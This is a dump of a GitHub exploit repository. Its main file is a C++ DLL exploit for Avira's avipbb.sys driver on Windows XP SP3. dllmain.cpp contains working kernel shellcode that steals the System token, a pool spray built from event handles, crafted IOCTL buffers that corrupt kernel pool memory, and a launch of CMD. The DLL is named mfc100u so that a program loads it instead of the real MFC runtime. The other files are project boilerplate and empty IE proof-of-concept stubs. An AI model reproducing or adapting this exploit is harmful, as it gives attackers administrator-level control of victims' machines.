-------------------------------------------------------------------------------- /Avira/SA55412_Avipbb.sys_filterBypass_pooloverflow/mfc100u/mfc100u.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 11.00 3 | # Visual Studio 2010 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "mfc100u", "mfc100u\mfc100u.vcxproj", "{209D88FA-0091-49F4-A9B8-FF7413D6F399}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Release|Win32 = Release|Win32 10 | EndGlobalSection 11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 12 | {209D88FA-0091-49F4-A9B8-FF7413D6F399}.Debug|Win32.ActiveCfg = Debug|Win32 13 | {209D88FA-0091-49F4-A9B8-FF7413D6F399}.Debug|Win32.Build.0 = Debug|Win32 14 | {209D88FA-0091-49F4-A9B8-FF7413D6F399}.Release|Win32.ActiveCfg = Release|Win32 15 | {209D88FA-0091-49F4-A9B8-FF7413D6F399}.Release|Win32.Build.0 = Release|Win32 16 | EndGlobalSection 17 | GlobalSection(SolutionProperties) = preSolution 18 | HideSolutionNode = FALSE 19 | EndGlobalSection 20 | EndGlobal 21 | -------------------------------------------------------------------------------- /Avira/SA55412_Avipbb.sys_filterBypass_pooloverflow/mfc100u/mfc100u.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suto/Exploit/53f84a050e0c8d4c82d9af6fc5354ab006e96ca9/Avira/SA55412_Avipbb.sys_filterBypass_pooloverflow/mfc100u/mfc100u.suo -------------------------------------------------------------------------------- /Avira/SA55412_Avipbb.sys_filterBypass_pooloverflow/mfc100u/mfc100u/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | DYNAMIC LINK LIBRARY : mfc100u Project Overview 3 | 
======================================================================== 4 | 5 | AppWizard has created this mfc100u DLL for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your mfc100u application. 9 | 10 | 11 | mfc100u.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | mfc100u.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | mfc100u.cpp 25 | This is the main DLL source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named mfc100u.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /Avira/SA55412_Avipbb.sys_filterBypass_pooloverflow/mfc100u/mfc100u/dllmain.cpp: -------------------------------------------------------------------------------- 1 | // dllmain.cpp : Defines the entry point for the DLL application. 
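#include "stdafx.h"

/* Structure offsets for 32-bit Windows XP SP3 only.  The shellcode below is
   hard-wired to them and will corrupt memory on any other build. */
#define _KPROCESS 0x44
#define _TOKEN    0xc8
#define _UPID     0x84
#define _APLINKS  0x88

/*
 * Token-stealing payload (kernel mode, XP SP3 x86): walks ActiveProcessLinks
 * from the current EPROCESS until UniqueProcessId == 4 (System) and copies
 * that Token over our own.  Only edx/ebx are saved; the old token is not
 * restored and no reference counts are touched.  Keep byte-identical to the
 * copies in the AhnLab exploits.
 */
VOID shellcode()
{
    __asm
    {
        push edx
        push ebx
        xor eax, eax
        mov eax, fs:[eax+124h]
        mov eax, [eax+_KPROCESS]
        mov ecx, eax
        mov ebx, [eax+_TOKEN]
    L:  mov eax, [eax+_APLINKS]
        sub eax, 88h
        cmp [eax+_UPID], 4
        jnz L
        mov edx, [eax+_TOKEN]
        mov eax, ecx
        mov [eax+_TOKEN], edx
        pop ebx
        pop edx
    }
}

/*
 * Runs the exploit against \\.\avipbb and returns the process exit code:
 * -1 if the device or the 0x300-byte buffer cannot be obtained, 0 otherwise.
 * Success of the kernel-side corruption is not detected; CMD is launched
 * regardless, as in the original.
 *
 * Sequence:
 *   1. IOCTL 0x222458 with an 8-byte blob - presumably the "filter bypass"
 *      step the directory name refers to; the bytes' meaning is not
 *      documented here.
 *   2. Build `memoo` (0x300 bytes) that request 2 points at:
 *        +0x000 DWORD 0x118           (same as inbuffer2's size)
 *        +0x004 DWORD -> memoo itself
 *        +0x104 DWORD 0x0a060024      (bytes 24 00 06 0a: pool-header shape
 *                                      used by the other PoCs, PreviousSize 0x24)
 *        +0x108 'Eve' tag, 0xdeadfa11, 0xcafebabe
 *        +0x114 DWORD -> fake (0x190 zero bytes, shellcode at +0xA8)
 *        +0x1f4 DWORD -> memoo itself
 *      everything else 0x41.
 *   3. Pool spray (cf. PoolBlade::AutoExploitInit): 0x100000 leaked events,
 *      0x10000 tracked ones, a hole of 6 consecutive events every 0x200.
 *   4. IOCTL 0x222450 with inbuffer2 (0x118 bytes of 0x45, memoo at +8).
 *
 * memoo and fake are intentionally not freed: the kernel may still
 * dereference them when the corrupted object is torn down (handle closes
 * below, process exit), and the process exits right after anyway.
 *
 * Fixes versus the original: the 8-byte blob is a BYTE array (0xE0 etc.
 * are narrowing for char), nOutBufferSize is 0 rather than NULL, closed
 * spray slots are NULLed and skipped in the final loop, hArr is released
 * with delete[], and the shadowed inner `i` is gone.
 */
DWORD Driver()
{
    HANDLE handle = CreateFileA("\\\\.\\avipbb", GENERIC_READ | GENERIC_WRITE,
                                FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING,
                                FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED, 0);
    if (handle == INVALID_HANDLE_VALUE)
        return (DWORD)-1;

    BYTE inbuffer[8] = {0xE0, 0xAB, 0xEB, 0xAC, 0xAF, 0xAB, 0xEB, 0x1F};
    DWORD dwSz = 0;
    /* Overlapped handle, NULL OVERLAPPED: unsupported per docs, relies on the
       driver completing synchronously (the original's assumption too). */
    DeviceIoControl(handle, 0x222458, inbuffer, sizeof(inbuffer), NULL, 0, &dwSz, NULL);

    BYTE *memoo = (BYTE *)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x300);
    if (memoo == NULL) {
        CloseHandle(handle);
        return (DWORD)-1;
    }
    memset(memoo, 0x41, 0x300);
    *(DWORD *)(memoo + 0x000) = 0x118;
    *(DWORD *)(memoo + 0x004) = (DWORD)memoo;
    *(DWORD *)(memoo + 0x1f4) = (DWORD)memoo;
    *(DWORD *)(memoo + 0x104) = 0x0a060024;
    *(DWORD *)(memoo + 0x108) = 0xee657645;
    *(DWORD *)(memoo + 0x10c) = 0xdeadfa11;
    *(DWORD *)(memoo + 0x110) = 0xcafebabe;

    BYTE *fake = new BYTE[0x190];
    memset(fake, 0, 0x190);
    *(DWORD *)(fake + 0xA8) = (DWORD)shellcode;
    *(DWORD *)(memoo + 0x114) = (DWORD)fake;

    char inbuffer2[0x118];
    memset(inbuffer2, 0x45, sizeof(inbuffer2));
    *(DWORD *)(inbuffer2 + 8) = (DWORD)memoo;

    char output[0x18];
    memset(output, 0x42, sizeof(output));

    HANDLE *hArr = new HANDLE[0x10000];
    for (int i = 0; i < 0x100000; i++)
        CreateEvent(NULL, FALSE, FALSE, NULL);

    for (int i = 0; i < 0x10000; i++)
        hArr[i] = CreateEvent(NULL, FALSE, FALSE, NULL);

    for (int i = 0; i < 0xf000; i += 0x200) {
        for (int j = 0; j < 6; j++) {
            CloseHandle(hArr[i + j]);
            hArr[i + j] = NULL;
        }
    }

    DeviceIoControl(handle, 0x222450, inbuffer2, sizeof(inbuffer2), output, sizeof(output),
                    &dwSz, NULL);

    for (int i = 0; i < 0x10000; i++) {
        if (hArr[i] != NULL)
            CloseHandle(hArr[i]);
    }
    delete[] hArr;
    CloseHandle(handle);
    WinExec("CMD", SW_SHOWNORMAL);
    return 0;
}

/*
 * This DLL is the exploit, not a library: on DLL_PROCESS_ATTACH it runs
 * Driver() and terminates the host with its result, so the loading process
 * never regains control.  Presumably the shipped exploit.exe picks up this
 * mfc100u.dll from its own directory in place of the real MFC runtime; that
 * is not verifiable from this listing.  Doing this much work (and ExitProcess)
 * under the loader lock is unsupported but is the intended behaviour here.
 */
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    (void)hModule;
    (void)lpReserved;

    if (ul_reason_for_call == DLL_PROCESS_ATTACH)
        ExitProcess(Driver());   /* does not return */
    return TRUE;
}

--------------------------------------------------------------------------------
/Avira/SA55412_Avipbb.sys_filterBypass_pooloverflow/mfc100u/mfc100u/mfc100u.vcxproj:
--------------------------------------------------------------------------------
Debug
Win32
Release
Win32
{209D88FA-0091-49F4-A9B8-FF7413D6F399}
Win32Proj
mfc100u
DynamicLibrary
true
Unicode
DynamicLibrary
false
true
Unicode
true
false
Use
Level3
Disabled
WIN32;_DEBUG;_WINDOWS;_USRDLL;MFC100U_EXPORTS;%(PreprocessorDefinitions)
Windows
true
Level3
Use
MaxSpeed
true
true
WIN32;NDEBUG;_WINDOWS;_USRDLL;MFC100U_EXPORTS;%(PreprocessorDefinitions)
Windows
true
true
true
false
false
Create
Create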
99 | 100 | -------------------------------------------------------------------------------- /Avira/SA55412_Avipbb.sys_filterBypass_pooloverflow/mfc100u/mfc100u/mfc100u.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | Header Files 29 | 30 | 31 | 32 | 33 | Source Files 34 | 35 | 36 | Source Files 37 | 38 | 39 | Source Files 40 | 41 | 42 | -------------------------------------------------------------------------------- /Avira/SA55412_Avipbb.sys_filterBypass_pooloverflow/mfc100u/mfc100u/mfc100u.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | -------------------------------------------------------------------------------- /Avira/SA55412_Avipbb.sys_filterBypass_pooloverflow/mfc100u/mfc100u/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // mfc100u.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /Avira/SA55412_Avipbb.sys_filterBypass_pooloverflow/mfc100u/mfc100u/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are 
used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | // Windows Header Files: 12 | #include 13 | 14 | 15 | 16 | // TODO: reference additional headers your program requires here 17 | -------------------------------------------------------------------------------- /Avira/SA55412_Avipbb.sys_filterBypass_pooloverflow/mfc100u/mfc100u/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /Microsoft/MS13_037_ieActiveXploitationMethod/js.htm: -------------------------------------------------------------------------------- 1 | 37 | 38 | -------------------------------------------------------------------------------- /Microsoft/MS13_037_ieActiveXploitationMethod/poc.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 9 | 10 | 11 | 12 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suto/Exploit/53f84a050e0c8d4c82d9af6fc5354ab006e96ca9/README.md --------------------------------------------------------------------------------